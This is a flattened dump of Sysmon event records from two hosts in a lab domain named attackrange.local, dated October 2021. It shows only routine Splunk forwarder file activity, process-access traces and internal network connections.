07:47:04.892{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D289EF9729E2C6028BC86235174942C5,SHA256=16F14BECC9C7D8FB09EA63648D9C91739FDBF5AA739D9819B269A1114B5A0C43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102890Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:04.658{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAE277C178F565C65C30DBFE594F3813,SHA256=BB8FC2ED76070908405C802FCAAF7FB4ACBEE1A9DFD896669485EFEB6D7E5508,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080751Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:02.657{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49981-false10.0.1.12-8000- 23542300x800000000000000080750Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:04.168{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED883BF1158E0E0BACC067735AADDFA3,SHA256=B9D193DFB59B971BF64F1E5323C6DB962785C2DCD874EF6293624BED27C01A1E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000102889Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:04.081{58E9C193-B177-615A-B301-00000000FC01}22805268C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000102900Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:05.673{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C305A85378E8A8C27022BF12683079C4,SHA256=2E22E8FE0D2C3130CA87CAFB5B80B0C90D1465C14D04686947B0AAE884F22B02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080752Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:05.168{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F4863DB258DAD15E74774008FD25637,SHA256=E73318419C417DE599C660A8DF9565A17EA58A37A63FD2E918620A16B88D16C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000102899Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:05.392{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B179-615A-B401-00000000FC01}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102898Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:05.392{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102897Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:05.392{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102896Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:05.392{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102895Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:05.392{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102894Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:05.392{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B179-615A-B401-00000000FC01}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000102893Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:05.392{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B179-615A-B401-00000000FC01}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000102892Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:05.393{58E9C193-B179-615A-B401-00000000FC01}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000102902Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:06.689{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D998480801001F2ECE1EE255C500942,SHA256=956DCA4A1A262DB34715740C3A4BA1F35D21AFECA4268AD5EB3B9C5FCEFA8724,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080753Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:06.168{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3D878C7761F5B06A659FBFDE8196986,SHA256=9F4AE39F79D7A2F514F1D77D0BA15383C05814C9CC3CEAF2EE46AAD3D3CA1FC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102901Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:06.392{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=635DD93B675FEE5EF8F0CA21EAC0E50F,SHA256=D9F745959D4ADE4894F72559DFD0C56335C3BF432D613A0A8EAC0EC1864FEC46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102903Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:07.689{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FF29FDF09CFE74154D99B11EEB96AE8,SHA256=21E0318A0B968B03E25EF18F4A2510B7AABEA20269C3513DDBCBAF884BC7BE1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080754Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:07.168{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F460E94999AAC00EFEEB1774196454B4,SHA256=8B6941CCE30FA42B8B97AF7DD9C913994222307ABD604E841831EFCD3EB425A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102905Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:07.281{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49477-false10.0.1.12-8000- 23542300x8000000000000000102904Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:08.689{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=323BC99AD5F9CC6EF16A1D7C5D448DC2,SHA256=4C8CF9B7598F659EE824AAAD33A74A8E9295077A1AC3BF6FDC97D95ECE342D35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080755Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:08.199{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41CCC0FE1F5EB12C526C8DDE069A99C3,SHA256=25EF51A4B690847AF2BA143B5756353724687BD0F64255BBFED179B32894D6F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102906Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:09.689{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83F7EC6EEC7EE5C0DA039EA9ABCA1641,SHA256=AFE4974C1F40760D7D004516DE8CC47695BC9F10846EC895DE0E7903C1827931,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080756Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:09.199{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=581C6AE16F8CD89AF43DCAAA9CDD5CAA,SHA256=D14A376AFDC693548FD882CAB6A02DF0F8BC17CE5F20AB057FC94BC26635DC9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102907Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:10.705{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5730729C29D28DEE40BCB520BF9C9442,SHA256=9A97BA38B99872E27F3F58E64943526D17BEEC21A7FF3DFE37C58125AE2448E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080758Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:08.579{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49982-false10.0.1.12-8000- 23542300x800000000000000080757Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:10.434{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=770DC7DC873C4C49B3422235EBCED9D6,SHA256=ED24B214FD7696222D4538CFCA104D85225130D9549C4E9C48BB277FFA3B0560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102908Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:11.705{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3871955A683BFADE043CAD71A0213512,SHA256=374AEC0642C066CECBE85ECF75F11ACA23B15EC88BB03C8A9B8B612360CF2636,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080759Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:11.496{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45BC98538912FE8742211765ADB8FF54,SHA256=BEFE50830B32E53AB5F555E079DAD9B94885BAEA3B141F1F08A023CD4483B231,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102909Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:12.751{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A5038C4C0CD5977A37B4DB00354ECDC,SHA256=0185DD87DACCCC99C7D794FA4DEA21D85B9197C0B03FD7F1613831ED3BC77083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080760Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:12.621{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53949A8B3F70A770579A5A8B8BC7BDFD,SHA256=E4A6CF3D3D6296A0484C49FD5DAE16DC9282FDAC6FC023D03895DAC4C3CCF2A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102910Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:13.783{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E14BEF0CA4FE166B68E0768561DAB55F,SHA256=328E282772B0074B888858BBD4983EA54595F7CE2B0EAF37DDA813DE9C45DC91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080761Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:13.621{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A97E880E8DC2F3711B31401F4E16112D,SHA256=95A3F112157394BBE34A63D61A68B79E14BFEF85262E965A29A2696525DD1101,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102912Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:14.845{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E492451621354060BF239A573B38C38,SHA256=2A6609DCCC92647E3D84E092C6BB56B8FA57B9369D587E4E994AE90076D66A71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080762Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:14.762{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1AB2A41C74C47C03E21F02476D93462,SHA256=7B9DFE73322D4026C6C5F86F1A6E918052BF04998C246DC9075DA02727F61B7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102911Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:12.468{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49478-false10.0.1.12-8000- 23542300x8000000000000000102913Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:15.947{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA3AE907C66E4401347FD369C7A4E84B,SHA256=C9721F4CEF98BEF1652F07664B5D7919190341C32A60947BF0C2B8065EB5D30B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080763Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:15.770{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1822F7DDA280FFB19C87FDD8386941C6,SHA256=0AABDC54E8DB3136B7D43F57596970B8228DB3466503815697C55BFC66462C5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080765Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:16.770{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEC7D9874B38A14B077E0606A588CB57,SHA256=C693CAB16EE22781FF6ECC279AC8ADA30456227442F8217E67E233410C69837C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102915Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:16.964{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DA2E40C5658828C95B8A0C671A24E36,SHA256=87F31C1F637F3B95D6D1C8645257EF473B3E1BA8B15A34915298AD99345C12C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102914Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:16.139{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-019MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080764Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:13.579{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49983-false10.0.1.12-8000- 23542300x8000000000000000102917Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:17.968{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E453D39B0B63FD6E43FB05219927AB48,SHA256=1945CF6AC99A7713AD6AE97854759C4E6857F5E6B65388220517F8FAE654821D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080766Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:17.773{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 